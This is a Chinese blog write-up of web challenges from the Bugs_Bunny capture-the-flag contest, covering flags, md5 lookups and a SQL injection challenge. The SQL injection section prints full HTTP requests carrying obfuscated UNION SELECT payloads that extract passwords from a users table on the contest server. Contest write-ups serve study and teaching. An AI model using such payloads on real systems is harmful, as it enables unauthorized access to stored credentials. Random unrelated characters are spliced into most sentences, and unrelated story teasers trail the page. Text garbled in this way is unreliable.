[Bugs_Bunny_CTF](web)部分簡單web

0x00 寫在前面

國外的比賽课锌,關(guān)注下ctf time庭再,就能收到國外一些比賽的信息士八,看看也是非常不錯的選擇裙秋。

這個比賽個人感覺挺有質(zhì)量的琅拌,自己太菜了好多寫不來

0x01 部分WP

1. Nothing here

QnVnc19CdW5ueXs1MjljNDI5YWJkZTIxNzFkMGEyNTU4NDQ3MmFmODIxN30K

Bugs_Bunny{529c429abde2171d0a25584472af8217}


2. Encryption

修改agent,得到兩個hash摘刑,

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1%2B5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

這兩個hash要怎么kill? 不是很懂題目什么套路

2017 7 31更新:

https://hashkiller.co.uk/text-encryption.aspx

password為:Hashkiller


3. Web100

查看DOM进宝,然后解md5

_

"6b07fd4ea837c39e1542e1bbca01a224"

__

"20ee80e63596799a1543bc9fd88d8878"

___

"21232f297a57a5a743894a0e4a801fc3"

從DOM目錄里面看到這幾md5,去解密枷恕,看下面幾行就好了党晋。

flag的字符順序一一對應(yīng),從h[0]開始找徐块。

看懂這一部分就OK未玻,

tunisia bunny? admin

inininynusutdamba

Bugs_Bunny{inininynusutdamba}


4. SimplePHP

題目很贊,有個兩個關(guān)鍵就是覆蓋POST和覆蓋原來上面定義的兩個變量胡控。


5. SQLI

這注入我是不想說什么了扳剿。無fuck說。

GET /LQI_X/?username=a'-0-'&password='or/**/1/**/union/**/select/**/'z'/**/order/**/by/**/1--&login=login HTTP/1.1

Host: 34.253.165.46

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

GET /LQI_X/?username=a'-1-'&password='or/**/0/**/union/**/select/**/(select/**/password/**/from/**/users/**/limit/**/3,1)/**/--&login=login HTTP/1.1

Host: 34.253.165.46

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Bugs_Bunny{SQLi_Easy_I_Dont_Think}

_Easy_I_Dont_Think}}

Bugs_Bunny{SQLi_Easy_!!_I_Dont_Think}

_Easy_I_Dont_Think

username位置過濾比較嚴(yán)苛昼激,在password注入庇绽,題目限制比較坑锡搜。最后flag我去提交都不對,有毒瞧掺。


0x02 小結(jié)

只看了下web余爆,只肝得出來這幾題,不知道國外的那些什么套路夸盟,比較菜,這里只是寫了答案像捶,有一起玩了的小伙伴有疑問的可以留言一起學(xué)習(xí)上陕。

比賽平臺不知道后面還開不開,wp出來之后有時間再詳細(xì)分析幾題吧拓春。

題目挺nice的释簿。

唉自己要努力啊。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末硼莽,一起剝皮案震驚了整個濱河市庶溶,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌懂鸵,老刑警劉巖偏螺,帶你破解...
    沈念sama閱讀 222,865評論 6 518
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異匆光,居然都是意外死亡套像,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,296評論 3 399
  • 文/潘曉璐 我一進(jìn)店門终息,熙熙樓的掌柜王于貴愁眉苦臉地迎上來夺巩,“玉大人,你說我怎么就攤上這事周崭×” “怎么了?”我有些...
    開封第一講書人閱讀 169,631評論 0 364
  • 文/不壞的土叔 我叫張陵续镇,是天一觀的道長美澳。 經(jīng)常有香客問我,道長磨取,這世上最難降的妖魔是什么人柿? 我笑而不...
    開封第一講書人閱讀 60,199評論 1 300
  • 正文 為了忘掉前任,我火速辦了婚禮忙厌,結(jié)果婚禮上凫岖,老公的妹妹穿的比我還像新娘。我一直安慰自己逢净,他們只是感情好哥放,可當(dāng)我...
    茶點故事閱讀 69,196評論 6 398
  • 文/花漫 我一把揭開白布歼指。 她就那樣靜靜地躺著,像睡著了一般甥雕。 火紅的嫁衣襯著肌膚如雪踩身。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,793評論 1 314
  • 那天社露,我揣著相機與錄音挟阻,去河邊找鬼。 笑死峭弟,一個胖子當(dāng)著我的面吹牛附鸽,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播瞒瘸,決...
    沈念sama閱讀 41,221評論 3 423
  • 文/蒼蘭香墨 我猛地睜開眼坷备,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了情臭?” 一聲冷哼從身側(cè)響起省撑,我...
    開封第一講書人閱讀 40,174評論 0 277
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎俯在,沒想到半個月后竟秫,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,699評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡跷乐,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,770評論 3 343
  • 正文 我和宋清朗相戀三年鸿摇,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片劈猿。...
    茶點故事閱讀 40,918評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡拙吉,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出揪荣,到底是詐尸還是另有隱情筷黔,我是刑警寧澤,帶...
    沈念sama閱讀 36,573評論 5 351
  • 正文 年R本政府宣布仗颈,位于F島的核電站佛舱,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏挨决。R本人自食惡果不足惜请祖,卻給世界環(huán)境...
    茶點故事閱讀 42,255評論 3 336
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望脖祈。 院中可真熱鬧肆捕,春花似錦、人聲如沸盖高。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,749評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至席纽,卻和暖如春捏悬,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背润梯。 一陣腳步聲響...
    開封第一講書人閱讀 33,862評論 1 274
  • 我被黑心中介騙來泰國打工过牙, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人纺铭。 一個月前我還...
    沈念sama閱讀 49,364評論 3 379
  • 正文 我出身青樓抒和,卻偏偏與公主長得像,于是被迫代替她去往敵國和親彤蔽。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,926評論 2 361

推薦閱讀更多精彩內(nèi)容

  • 此段內(nèi)容簡要來自自強學(xué)堂的教程詳情請查詢自強學(xué)堂 一庙洼、 后臺的運作流程 接收request請求 處理數(shù)據(jù) 獲取請求...
    coder_ben閱讀 5,246評論 6 56
  • 前言 本篇整理信息收集階段顿痪,大概會占滲透測試總時間的60%,視能力和情況而定油够,做到不影響企業(yè)業(yè)務(wù)正常運行的情況下蚁袭,...
    wind_飄閱讀 3,273評論 0 2
  • 之前在Sencha Cmd創(chuàng)建Ext JS示例項目演示了用Sencha Cmd來創(chuàng)建一個Login示例。在這里會演...
    寫意悠悠閱讀 8,877評論 4 24
  • 環(huán)境準(zhǔn)備 第三方庫 unofficial website https://www.lfd.uci.edu/~goh...
    我吃我樣閱讀 275評論 0 0
  • 成長有早有晚石咬,我晚了十年揩悄。
    lovegrace閱讀 149評論 0 0